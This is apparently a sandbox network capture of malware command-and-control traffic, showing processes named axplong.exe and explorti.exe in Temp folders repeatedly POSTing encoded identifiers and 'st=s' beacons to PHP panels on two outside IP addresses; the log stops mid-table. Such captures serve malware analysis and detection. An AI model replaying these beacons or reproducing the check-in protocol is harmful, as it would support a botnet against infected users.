Jul 26, 2024 17:58:07.321717978 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:08.135324955 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.5	61493	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:07.894881964 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:08.710675001 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.5	61494	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:08.270545959 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:09.042747021 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:09.046025991 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:09.294703007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.5	61495	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:08.838253975 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:09.787372112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:09.790642977 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:10.057962894 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.5	61496	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:09.428045988 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:10.195117950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.5	61498	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:10.190510035 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:11.033144951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	61499	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:10.216588974 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:11.042068958 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	61500	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:11.050853014 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:11.805303097 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	61501	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:11.169513941 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:11.924906969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:11.973058939 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:12.219970942 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	61502	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:11.994424105 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:12.743273973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	61503	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:12.343564034 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:13.092190027 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:13.096158028 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:13.345098019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	61504	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:12.759934902 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:13.563359976 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	61505	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:13.475835085 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:14.308638096 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 17:58:14.313163042 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:14.567610979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	61506	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:13.691082954 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:14.446412086 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	61507	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:14.461818933 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 17:58:15.248071909 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	61509	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:14.690710068 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:15.469764948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	61510	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:15.365458012 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 17:58:16.169476986 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	61511	185.215.113.19	80	3652	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 17:58:15.491632938 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 17:58:16.358360052 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 15:58:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	61513	185.215.113.16	80	3924	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
